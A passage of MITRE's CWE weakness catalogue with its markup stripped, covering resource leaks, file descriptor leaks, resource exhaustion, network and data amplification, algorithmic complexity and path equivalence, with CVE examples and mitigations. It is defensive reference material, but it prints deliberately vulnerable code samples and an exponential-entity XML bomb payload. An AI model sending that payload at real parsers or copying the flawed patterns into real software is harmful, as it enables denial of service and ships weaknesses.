Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, References, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, Demonstrative_Examples, Name, References, Relationships, Taxonomy_Mappings, Type, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Name - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Memory Leak - Failure to Release Memory Before Removing Last Reference (aka 'Memory Leak') - Failure to Release Memory Before Removing Last Reference ('Memory Leak') - Improper Release of Memory Before Removing Last Reference ('Memory Leak') - Improper Release of Memory Before Removing Last Reference - - - - The software makes resources available to untrusted parties when those resources are only intended to be accessed by the software. - - - - - - Resource Leak - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Application Data - - - - - Resource leaks - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Resource Leaks - Transmission of Private Resources into a New Sphere (aka 'Resource Leak') - - - - A process does not close sensitive file descriptors before invoking a child process, which allows the child to perform unauthorized I/O operations using those descriptors. - When a new process is forked or executed, the child process inherits any open file descriptors. When the child process has fewer privileges than the parent process, this might introduce a vulnerability if the child process can access the file descriptor but does not have the privileges to access the associated file. - - - - - - - - - - File descriptor leak - While this issue is frequently called a file descriptor leak, the "leak" term is often used in two different ways - exposure of a resource, or consumption of a resource. Use of this term could cause confusion. - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - CVE-2003-0740 - Server leaks a privileged file descriptor, allowing the server to be hijacked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740 - - - CVE-2004-1033 - File descriptor leak allows read of restricted files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1033 - - - CVE-2000-0094 - Access to restricted resource using modified file descriptor for stderr. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0094 - - - CVE-2002-0638 - Open file descriptor used as alternate channel in complex race condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0638 - - - CVE-2003-0489 - Program does not fully drop privileges after creating a file descriptor, which allows access to the descriptor via a separate vulnerability. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0489 - - - CVE-2003-0937 - User bypasses restrictions by obtaining a file descriptor then calling setuid program, which does not close the descriptor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0937 - - - CVE-2004-2215 - Terminal manager does not properly close file descriptors, allowing attackers to access terminals of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2215 - - - CVE-2006-5397 - Module opens a file for reading twice, allowing attackers to read files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5397 - - - - System Process - File or Directory - - - - UNIX file descriptor leak - - - FIO42-C - Ensure files are properly closed when they are no longer needed - - - SFP23 - Exposed Data - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Affected_Resources, Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Description, Name, Observed_Examples, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - UNIX File Descriptor Leak - Exposure of File Descriptor to Unintended Control Sphere - - - - The program does not release or incorrectly releases a resource before it is made available for re-use. - When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation. - - - - - - - - Primary - Improper release or shutdown of resources can be primary to resource exhaustion, performance, and information confidentiality problems to name a few. - - - Resultant - Improper release or shutdown of resources can be resultant from improper error handling or insufficient resource tracking. - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Availability - Other - DoS: Resource Consumption (Other) - Varies by Context - Most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service attack by depleting the resource pool. - - - Confidentiality - Read Application Data - When a resource containing sensitive information is not correctly shutdown, it may expose the sensitive data in a subsequent allocation. - - - - - Automated Dynamic Analysis - - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Resource clean up errors might be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - Moderate - - - Manual Dynamic Analysis - Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated. - - - - Implementation - It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions. - - - Implementation - Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[]. - - - Implementation - When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself. - - - - - The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called. - - private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}} - - The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure. - - private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}fil.Close();} - - - - This code attempts to open a connection to a database and catches any exceptions that may occur. - - try {Connection con = DriverManager.getConnection(some_connection_string);}catch ( Exception e ) {log( e );} - - If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application. - - - Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. - - ...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();... - - - - The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles. - - int decodeFile(char* fName) { - char buf[BUF_SZ];FILE* f = fopen(fName, "r");if (!f) {printf("cannot open %s\n", fName);return DECODE_FAIL;}else { - while (fgets(buf, BUF_SZ, f)) {if (!checkChecksum(buf)) {return DECODE_FAIL;}else {decodeBlock(buf);}} - }fclose(f);return DECODE_SUCCESS; - } - - - - In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource. - - class A {void foo();};void A::foo(){int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;} - - - - In this example, the program calls the delete[] function on non-heap memory. - - class A{void foo(bool);};void A::foo(bool heap) {int localArray[2] = {11,22};int *p = localArray;if (heap){p = new int[2];}delete[] p;} - - - - - - CVE-1999-1127 - Does not shut down named pipe connections if malformed data is sent. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127 - - - CVE-2001-0830 - Sockets not properly closed when attacker repeatedly connects and disconnects from server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830 - - - CVE-2002-1372 - Return values of file/socket operations not checked, allowing resultant consumption of file descriptors. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372 - - - - - Improper resource shutdown or release - - - Unreleased Resource - - - A9 - Denial of Service - CWE More Specific - - - FIO42-C - Close files when they are no longer needed - CWE More Abstract - - - MEM31-C - Free dynamically allocated memory when no longer needed - CWE More Abstract - - - FIO04-J - Release resources when they are no longer needed - - - SFP14 - Failure to release resource - - - - - - - - - - - - - - - - Overlaps memory leaks, asymmetric resource consumption, malformed input errors. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - Software that does not appropriately monitor or control resource consumption can lead to adverse system performance. - This situation is amplified if the software allows malicious users or attackers to consume more resources than their access level permits. Exploiting such a weakness can lead to asymmetric resource consumption, aiding in amplification attacks against the system or the network. - - - - - - - - - Operation - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Amplification - DoS: Resource Consumption (Other) - Sometimes this is a factor in "flood" attacks, but other types of amplification exist. - - - - - Architecture and Design - An application must make resources available to a client commensurate with the client's access level. - - - Architecture and Design - An application must, at all times, keep track of allocated resources and meter their usage appropriately. - - - - - Asymmetric resource consumption (amplification) - - - A9 - Denial of Service - CWE More Specific - - - 41 - XML Attribute Blowup - - - TPS00-J - Use thread pools to enable graceful degradation of service during traffic bursts - - - FIO04-J - Release resources when they are no longer needed - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor. - In the absence of a policy to restrict asymmetric resource consumption, the application or system cannot distinguish between legitimate transmissions and traffic intended to serve as an amplifying attack on target systems. Systems can often be configured to restrict the amount of traffic sent out on behalf of a client, based on the client's origin or access level. This is usually defined in a resource allocation policy. In the absence of a mechanism to keep track of transmissions, the system or application can be easily abused to transmit asymmetrically greater traffic than the request or client should be permitted to. - - - - - - - - - Operation - - - Architecture and Design - If the application uses UDP, then it could potentially be subject to spoofing attacks that use the inherent weaknesses of UDP to perform traffic amplification, although this problem can exist in other protocols or contexts. - - - Implementation - - - - - Availability - DoS: Amplification - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - System resources can be quickly consumed leading to poor application performance or system crash. This may affect network performance and could be used to attack other systems and applications relying on network performance. - - - - - Architecture and Design - Separation of Privilege - An application must make network resources available to a client commensurate with the client's access level. - - - Policy - Define a clear policy for network resource allocation and consumption. - - - Implementation - An application must, at all times, keep track of network resources and meter their usage appropriately. - - - - - This code listens on a port for DNS requests and sends the result to the requesting address. - - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true: - data = sock.recvfrom(1024)if not data:break - (requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record) - - - - This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. - - - - - CVE-1999-0513 - Classic "Smurf" attack, using spoofed ICMP packets to broadcast addresses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513 - - - CVE-1999-1379 - DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379 - - - CVE-2000-0041 - Large datagrams are sent in response to malformed datagrams. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0041 - - - CVE-1999-1066 - Game server sends a large amount. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1066 - - - CVE-2013-5211 - composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211 - - - - - Network Amplification - - - - This can be resultant from weaknesses that simplify spoofing attacks. - Network amplification, when performed with spoofing, is normally a multi-channel attack from attacker (acting as user) to amplifier, and amplifier to victim. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Enabling_Factors_for_Exploitation, Name, Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Network Amplification - - - - An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached. - - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - The typical consequence is CPU consumption, but memory consumption and consumption of other resources can also occur. - - - - - CVE-2003-0244 - CPU consumption via inputs that cause many hash table collisions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0244 - - - CVE-2003-0364 - CPU consumption via inputs that cause many hash table collisions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0364 - - - CVE-2002-1203 - Product performs unnecessary processing before dropping an invalid packet. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1203 - - - CVE-2001-1501 - CPU and memory consumption using many wildcards. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1501 - - - CVE-2004-2527 - Product allows attackers to cause multiple copies of a program to be loaded more quickly than the program can detect that other copies are running, then exit. This type of error should probably have its own category, where teardown takes more time than initialization. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2527 - - - CVE-2006-6931 - Network monitoring system allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a "backtracking attack." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931 - - - CVE-2006-3380 - Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3380 - - - CVE-2006-3379 - Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3379 - - - CVE-2005-2506 - OS allows attackers to cause a denial of service (CPU consumption) via crafted Gregorian dates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2506 - - - CVE-2005-1792 - Memory leak by performing actions faster than the software can clear them. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1792 - - - - Cryptography - - - - Algorithmic Complexity - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Functional_Areas, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2019-06-20 - updated Name, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated References - - Algorithmic Complexity - - - - The software allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Amplification - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash. - - - - - This data prints the contents of a specified file requested by a user. - - function printFile($username,$filename){ - - - //read file into string - $file = file_get_contents($filename);if ($file && isOwnerOf($username,$filename)){echo $file;return true;}else{echo 'You are not authorized to view this file';}return false; - } - - This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway. - - - - - CVE-2004-2458 - Tool creates directories before authenticating user. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2458 - - - - - Early Amplification - - - - Overlaps authentication errors. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Early Amplification - - - - The software does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output. - An example of data amplification is a "decompression bomb," a small ZIP file that can produce a large amount of data when it is decompressed. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Amplification - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash. - - - - - The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. - - <?xml version="1.0"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO "A"><!ENTITY ONE "&ZERO;&ZERO;"><!ENTITY TWO "&ONE;&ONE;">...<!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;">]><data>&THIRTYTWO;</data> - - - - - - CVE-2009-1955 - XML bomb in web server module - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955 - - - CVE-2003-1564 - Parsing library allows XML bomb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564 - - - - - Data Amplification - - - IDS04-J - Limit the size of files passed to ZipInputStream - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Data Amplification - Failure to Handle Highly Compressed Data (Data Amplification) - - - - The system or application is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object. - Path equivalence is usually employed in order to circumvent access controls expressed using an incomplete set of file name or file path representations. This is different from path traversal, wherein the manipulations are performed to generate a name for a different object. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Read Files or Directories - Modify Files or Directories - Bypass Protection Mechanism - An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as 